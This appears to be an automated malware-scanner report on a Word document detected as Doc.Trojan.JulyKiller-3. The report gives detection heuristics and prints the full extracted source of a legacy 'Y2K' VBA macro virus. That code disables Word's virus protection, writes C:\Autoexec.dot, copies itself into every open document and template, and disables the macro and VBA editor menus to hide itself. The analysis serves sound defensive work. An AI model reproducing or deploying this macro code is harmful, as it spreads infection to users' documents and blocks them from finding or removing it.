MALICIOUS
196
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, which are commonly used for malicious purposes. The script attempts to disable macro protection and copy itself to other documents, indicating a self-propagation or downloader behavior. The ClamAV detection 'Doc.Trojan.JulyKiller-3' further supports its malicious nature.
Heuristics 6
-
ClamAV: Doc.Trojan.JulyKiller-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.JulyKiller-3
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6751 bytes |
SHA-256: 26b4ac813fc03ce95c72661e32898c7d6a4491499f1ae01579d9b56f6bd9e9bb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Y2K"
Sub actNo()
End Sub
Sub Autos()
Dim file$
Dim ans$
Dim test
Dim mItem
Dim cItem
Dim aDoc
Dim aTemp
Dim vset
Dim Iset
Dim ad
Dim y2kDate As Long
Application.ScreenUpdating = False
For Each ad In AddIns
If ad.Name = "Autoexec.dot" Then
ad.Installed = False
End If
Next ad
With Dialogs(wdDialogToolsOptionsFileLocations)
.Path = "STARTUP-PATH"
.Setting = "c:\"
.Execute
End With
If Options.VirusProtection Then
Options.VirusProtection = False
End If
file$ = WordBasic.[MacroFileName$]()
If InStr(file$, "Autoexec") <> 0 Then
For Each aDoc In Documents
For Each cItem In aDoc.VBProject.VBComponents
If (cItem.Name = "Y2K") Then
vset = 1
End If
Next cItem
Next aDoc
For Each cItem In NormalTemplate.VBProject.VBComponents
If (cItem.Name = "Y2K") Then
vset = 1
End If
Next cItem
If vset <> 1 Then
WordBasic.DisableAutoMacros
Documents.Open FileName:="C:\Autoexec.dot", AddToRecentFiles:=False
For Each aDoc In Documents
If (InStr(aDoc.FullName, Application.PathSeparator) <> 0) And (aDoc.VBProject.Protection = 0) Then
WordBasic.MacroCopy ActiveDocument.FullName + ":Y2K", aDoc.FullName + ":Y2K"
End If
Next aDoc
For Each aTemp In Templates
If (InStr(aTemp.FullName, Application.PathSeparator) <> 0) And (aTemp.VBProject.Protection = 0) Then
WordBasic.MacroCopy ActiveDocument.FullName + ":Y2K", aTemp.FullName + ":Y2K"
End If
Next aTemp
ActiveDocument.Save
ActiveDocument.Close
End If
If vset = 1 Then
GoTo out
End If
End If
With Application.FileSearch
.LookIn = "C:\"
.FileName = "Autoexec.dot"
If .Execute > 0 Then
Iset = 1
End If
End With
If Iset <> 1 Then
WordBasic.DisableAutoMacros
Documents.Add NewTemplate:=True
WordBasic.MacroCopy file$ + ":Y2K", ActiveDocument.FullName + ":Y2K"
ActiveDocument.SaveAs FileName:="c:\Autoexec.dot", AddToRecentFiles:=False
ActiveDocument.Close
End If
For Each aDoc In Documents
If (file$ <> aDoc.FullName) And (aDoc.VBProject.Protection = 0) Then
For Each cItem In aDoc.VBProject.VBComponents
If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then
aDoc.VBProject.VBComponents.Remove (cItem)
End If
Next cItem
End If
Next aDoc
For Each aTemp In Templates
If (file$ <> aTemp.FullName) And (aTemp.VBProject.Protection = 0) Then
For Each cItem In aTemp.VBProject.VBComponents
If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then
aTemp.VBProject.VBComponents.Remove (cItem)
End If
Next cItem
End If
Next aTemp
For Each aDoc In Documents
If (InStr(aDoc.FullName, Application.PathSeparator) <> 0) And (aDoc.VBProject.Protection = 0) Then
WordBasic.MacroCopy file$ + ":Y2K", aDoc.FullName + ":Y2K"
aDoc.Save
End If
Next aDoc
For Each aTemp In Templates
If (InStr(aTemp.FullName, Application.PathSeparator) <> 0) And (aTemp.VBProject.Protection = 0) Then
WordBasic.MacroCopy file$ + ":Y2K", aTemp.FullName + ":Y2K"
End If
Next aTemp
out:
If InStr(file$, "Normal") = 0 Then
CustomizationContext = NormalTemplate
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="FileSaveAs"
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="FileSaveAs"
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF1))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ToolsMacro"
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF2))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ViewVBCode"
For Each mItem In CommandBars("Tools").Controls
If mItem.Caption = "自定义(&C)..." Then
mItem.OnAction = ""
End If
If mItem.Caption = "模板和加载项(&I)..." Then
mItem.OnAction = ""
End If
If mItem.Caption = "选项(&O)..." Then
mItem.OnAction = ""
End If
Next mItem
For Each mItem In CommandBars("File").Controls
If mItem.Caption = "新建(&N)..." Then
mItem.OnAction = "NewDoc"
End If
If mItem.Caption = "保存(&S)" Then
mItem.OnAction = "SaveDoc"
End If
Next mItem
For Each cItem In CommandBars("Tools").Controls
If cItem.Type = msoControlPopup Then
If cItem.Caption = "宏(&M)" Then
For Each mItem In cItem.CommandBar.Controls
If mItem.Caption = "宏(&M)..." Then
mItem.OnAction = ""
End If
If mItem.Caption = "Visual Basic 编辑器(&V)" Then
mItem.OnAction = ""
End If
Next mItem
End If
End If
Next cItem
For Each cItem In CommandBars("Visual Basic").Controls
cItem.OnAction = ""
Next cItem
For Each cItem In CommandBars("Standard").Controls
If cItem.Index = 1 Then
cItem.OnAction = "NewDoc"
End If
If cItem.Index = 3 Then
cItem.OnAction = "SaveDoc"
End If
Next cItem
For Each cItem In CommandBars
If cItem.Visible = True Then
cItem.Protection = msoBarNoCustomize
End If
Next cItem
End If
For Each myTask In Tasks
If InStr(myTask.Name, "Visual Basic") > 0 Then
myTask.Visible = False
End If
Next myTask
Application.ScreenUpdating = True
End Sub
Sub AutoOpen()
Autos
End Sub
Sub AutoClose()
Autos
End Sub
Sub AutoNew()
Autos
End Sub
Sub AutoExec()
Autos
End Sub
Sub NewDoc()
Documents.Add Template:="", NewTemplate:=False
Autos
End Sub
Sub SaveDoc()
ActiveDocument.Save
Autos
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.